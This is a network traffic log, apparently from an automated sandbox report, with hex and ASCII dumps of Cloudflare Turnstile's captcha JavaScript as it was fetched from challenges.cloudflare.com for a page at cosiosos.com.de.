2024-10-29 17:46:27 UTC	1369	IN	Data Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 6e 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 55 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 Data Ascii: ray$/.test(n))return nt(e,r)}}function Ae(e,r){return Bt(e)\|\|jt(e,r)\|\|zt(e,r)\|\|qt()}function U(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var n={label:0,sent:function(){if(l[0
2024-10-29 17:46:27 UTC	1369	IN	Data Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75 Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var Ue=300030;var Ve=300031;var q;(fu
2024-10-29 17:46:27 UTC	1369	IN	Data Raw: 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 24 7c 7c 28 24 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 Data Ascii: .NEVER="never",e.MANUAL="manual",e.AUTO="auto"})($\|\|($={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie\|\|(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X\|\|(X={}));var
2024-10-29 17:46:27 UTC	1369	IN	Data Raw: 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 51 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 Data Ascii: e","false"],e)}function gt(e){return L(["render","execute"],e)}var Qt=300,$t=10;function ht(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOver
2024-10-29 17:46:27 UTC	1369	IN	Data Raw: 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 73 29 7d 76 61 72 20 54 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 68 3d 4c 28 4e 72 2c 28 6c 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 70 2c Data Ascii: age,"/").concat(s)}var Tt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK\|\|e.state===Se.FAILURE_HAVING_TROUBLES,l,h=L(Nr,(l=(r=e.displayLanguage)===null\|\|r===void 0?void 0:r.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),p,
2024-10-29 17:46:27 UTC	1369	IN	Data Raw: 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 42 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 68 29 7b 76 61 72 20 70 3d 5b 6e 75 6c 6c 5d 3b 70 2e 70 75 73 68 2e 61 70 70 6c 79 28 70 2c 6c 29 3b 76 61 72 20 66 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 70 29 2c 73 3d 6e 65 77 20 66 3b 72 65 74 75 72 6e 20 68 26 26 4a 28 73 2c 68 2e 70 72 6f 74 6f 74 79 70 65 29 2c 73 7d 2c 49 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 Data Ascii: ect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return Be()?Ie=Reflect.construct:Ie=function(c,l,h){var p=[null];p.push.apply(p,l);var f=Function.bind.apply(c,p),s=new f;return h&&J(s,h.prototype),s},Ie.apply(null,argument
2024-10-29 17:46:27 UTC	1369	IN	Data Raw: 74 69 6f 6e 20 67 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 Data Ascii: tion g(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}func
2024-10-29 17:46:27 UTC	1369	IN	Data Raw: 6f 70 3d 22 30 22 2c 70 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 70 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 70 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 70 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 70 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 66 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 66 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 66 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 66 2e 73 74 79 6c Data Ascii: op="0",p.style.left="0",p.style.transformOrigin="center center",p.style.overflowX="hidden",p.style.overflowY="auto",p.style.background="rgba(0,0,0,0.4)";var f=document.createElement("div");f.style.display="table-cell",f.style.verticalAlign="middle",f.styl

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:46:28 UTC	383	OUT	GET /turnstile/v0/g/f2bbd6738e15/api.js HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-29 17:46:28 UTC	471	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 17:46:28 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 47532 Connection: close accept-ranges: bytes last-modified: Fri, 18 Oct 2024 17:38:58 GMT cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public access-control-allow-origin: * cross-origin-resource-policy: cross-origin Server: cloudflare CF-RAY: 8da4fc394a4f2821-DFW alt-svc: h3=":443"; ma=86400
2024-10-29 17:46:28 UTC	1369	IN	Data Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 68 29 7b 74 72 79 7b 76 61 72 20 70 3d 65 5b 6c 5d 28 68 29 2c 66 3d 70 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 6e 28 73 29 3b 72 65 74 75 72 6e 7d 70 2e 64 6f 6e 65 3f 72 28 66 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 66 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74 Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,l,h){try{var p=e[l](h),f=p.value}catch(s){n(s);return}p.done?r(f):Promise.resolve(f).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
2024-10-29 17:46:28 UTC	1369	IN	Data Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 6a 74 28 65 2c 72 29 7b 76 61 72 20 6e 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 6e 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 6c 3d 21 31 2c 68 2c 70 3b 74 72 79 7b 66 6f 72 28 6e 3d 6e 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 68 3d 6e 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 68 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 63 3d 21 30 29 Data Ascii: t(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]\|\|e["@@iterator"];if(n!=null){var o=[],c=!0,l=!1,h,p;try{for(n=n.call(e);!(c=(h=n.next()).done)&&(o.push(h.value),!(r&&o.length===r));c=!0)
2024-10-29 17:46:28 UTC	1369	IN	Data Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 66 28 73 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 68 26 26 28 68 3d 30 2c 73 5b 30 5d 26 26 28 6e 3d 30 29 29 2c 6e 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 6c 3d 73 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 73 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 6c 3d 63 2e 72 65 74 75 72 6e 29 26 26 6c 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 6c 3d 6c 2e 63 61 6c 6c 28 63 2c 73 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 6c 3b 73 77 69 74 63 68 28 63 3d 30 2c 6c 26 26 28 73 3d 5b 73 5b 30 5d 26 32 2c 6c 2e 76 61 6c Data Ascii: ])}}function f(s){if(o)throw new TypeError("Generator is already executing.");for(;h&&(h=0,s[0]&&(n=0)),n;)try{if(o=1,c&&(l=s[0]&2?c.return:s[0]?c.throw\|\|((l=c.return)&&l.call(c),0):c.next)&&!(l=l.call(c,s[1])).done)return l;switch(c=0,l&&(s=[s[0]&2,l.val
2024-10-29 17:46:28 UTC	1369	IN	Data Raw: 29 29 3b 76 61 72 20 50 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 50 65 7c 7c 28 50 65 3d 7b 7d 29 29 3b 76 61 72 20 53 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 76 65 72 69 66 79 69 6e 67 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 46 41 49 4c 55 52 45 5f 57 4f 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69 6c 75 72 65 2d 77 6f 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e Data Ascii: ));var Pe;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Pe\|\|(Pe={}));var Se;(function(e){e.VERIFYING="verifying",e.VERIFYING_HAVING_TROUBLES="verifying-having-troubles",e.FAILURE_WO_HAVING_TROUBLES="failure-wo-having-troubles",e.FAILURE_HAVIN
2024-10-29 17:46:28 UTC	1369	IN	Data Raw: 53 5f 4c 4f 4f 50 49 4e 47 3d 22 6b 65 65 70 73 2d 6c 6f 6f 70 69 6e 67 22 2c 65 2e 54 4f 4f 5f 53 4c 4f 57 3d 22 74 6f 6f 2d 73 6c 6f 77 22 2c 65 2e 4f 54 48 45 52 3d 22 6f 74 68 65 72 22 7d 29 28 61 74 7c 7c 28 61 74 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 4c 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 64 61 72 6b 22 2c 22 6c 69 67 68 74 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 63 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 30 26 26 65 3c 39 65 35 7d 66 75 6e 63 74 69 6f Data Ascii: S_LOOPING="keeps-looping",e.TOO_SLOW="too-slow",e.OTHER="other"})(at\|\|(at={}));function L(e,r){return e.indexOf(r)!==-1}function it(e){return L(["auto","dark","light"],e)}function ot(e){return L(["auto","never"],e)}function ct(e){return e>0&&e<9e5}functio
2024-10-29 17:46:28 UTC	1369	IN	Data Raw: 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 4a 74 3d 22 2e 63 66 2d 74 75 72 6e 73 74 69 6c 65 22 2c 5a 74 3d 22 2e 63 66 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 65 72 3d 22 2e 67 2d 72 65 63 61 70 74 63 68 61 22 2c 79 74 3d 22 63 66 5f 63 68 61 6c 6c 65 6e 67 65 5f 72 65 73 70 6f 6e 73 65 22 2c 5f 74 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 2c 62 74 3d 22 67 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 22 2c 74 72 3d 38 65 33 2c 45 74 3d 22 70 72 69 76 61 74 65 2d 74 6f 6b 65 6e 22 2c 72 72 3d 33 2c 6e 72 3d 35 30 30 2c 61 72 3d 35 30 30 2c 59 3d 22 30 2f 30 22 3b 76 61 72 20 4e 72 3d 5b 22 62 67 2d 62 67 22 2c 22 64 61 2d 64 6b 22 2c 22 64 65 2d 64 65 22 2c 22 65 6c 2d 67 72 22 2c 22 6a 61 2d 6a 70 22 2c 22 6d 73 Data Ascii: are-challenge",Jt=".cf-turnstile",Zt=".cf-challenge",er=".g-recaptcha",yt="cf_challenge_response",_t="cf-turnstile-response",bt="g-recaptcha-response",tr=8e3,Et="private-token",rr=3,nr=500,ar=500,Y="0/0";var Nr=["bg-bg","da-dk","de-de","el-gr","ja-jp","ms
2024-10-29 17:46:28 UTC	1369	IN	Data Raw: 22 34 38 30 70 78 22 3a 68 3f 22 35 38 30 70 78 22 3a 22 35 37 30 70 78 22 7d 2c 4c 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 69 73 56 65 72 62 6f 73 65 4c 61 6e 67 75 61 67 65 2c 6e 3d 65 2e 69 73 53 6d 61 6c 6c 65 72 46 65 65 64 62 61 63 6b 2c 6f 3d 65 2e 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3b 72 65 74 75 72 6e 20 6e 26 26 72 3f 22 35 34 30 70 78 22 3a 6e 26 26 6f 3f 22 35 30 30 70 78 22 3a 6e 3f 22 34 38 30 70 78 22 3a 72 3f 22 36 35 30 70 78 22 3a 6f 3f 22 35 39 30 70 78 22 3a 22 35 37 30 70 78 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 48 65 28 65 29 7b 69 66 28 65 3d 3d 3d 76 6f 69 64 20 30 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 Data Ascii: "480px":h?"580px":"570px"},Lr=function(e){var r=e.isVerboseLanguage,n=e.isSmallerFeedback,o=e.isModeratelyVerbose;return n&&r?"540px":n&&o?"500px":n?"480px":r?"650px":o?"590px":"570px"};function He(e){if(e===void 0)throw new ReferenceError("this hasn't be
2024-10-29 17:46:28 UTC	1369	IN	Data Raw: 6e 63 74 69 6f 6e 20 6a 65 28 65 29 7b 76 61 72 20 72 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 6a 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 63 72 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 69 66 28 74 79 70 65 6f 66 20 72 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 69 66 28 72 2e 68 61 73 28 6f 29 29 72 65 74 75 72 6e 20 72 2e 67 65 Data Ascii: nction je(e){var r=typeof Map=="function"?new Map:void 0;return je=function(o){if(o===null\|\|!cr(o))return o;if(typeof o!="function")throw new TypeError("Super expression must either be null or a function");if(typeof r!="undefined"){if(r.has(o))return r.ge
2024-10-29 17:46:28 UTC	1369	IN	Data Raw: 2e 74 65 73 74 28 63 2e 73 72 63 29 29 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 64 72 28 29 7b 76 61 72 20 65 3d 52 74 28 29 3b 65 7c 7c 67 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 72 3d 65 2e 73 72 63 2c 6e 3d 7b 6c 6f 61 64 65 64 41 73 79 6e 63 3a 21 31 2c 70 61 72 61 6d 73 3a 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 2c 73 72 63 3a 72 7d 3b 28 65 2e 61 73 79 6e 63 7c 7c 65 2e 64 65 66 65 72 29 26 26 28 6e 2e 6c 6f 61 64 65 64 41 73 79 6e 63 3d 21 30 29 3b 76 61 72 20 6f 3d 72 2e 73 70 6c 69 74 28 22 3f 22 29 3b Data Ascii: .test(c.src))return c}function dr(){var e=Rt();e\|\|g("Could not find Turnstile script tag, some features may not be available",43777);var r=e.src,n={loadedAsync:!1,params:new URLSearchParams,src:r};(e.async\|\|e.defer)&&(n.loadedAsync=!0);var o=r.split("?");
2024-10-29 17:46:28 UTC	1369	IN	Data Raw: 61 74 69 76 65 22 2c 73 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 37 22 2c 73 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 73 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 61 64 69 75 73 3d 22 35 70 78 22 2c 73 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 70 78 22 2c 73 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 70 78 22 2c 73 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64 65 6e 22 2c 73 2e 73 74 79 6c 65 2e 6d 61 72 67 69 6e 3d 22 30 70 78 20 61 75 74 6f 22 3b 76 61 72 20 77 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 77 2e 69 64 3d 65 2b 22 2d 66 72 22 2c 77 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 Data Ascii: ative",s.style.zIndex="2147483647",s.style.backgroundColor="#ffffff",s.style.borderRadius="5px",s.style.left="0px",s.style.top="0px",s.style.overflow="hidden",s.style.margin="0px auto";var w=document.createElement("iframe");w.id=e+"-fr",w.setAttribute("sr

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:46:28 UTC	798	OUT	GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/910uj/0x4AAAAAAAymLki0nrxyy8m1/auto/fbE/normal/auto/ HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://cosiosos.com.de/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
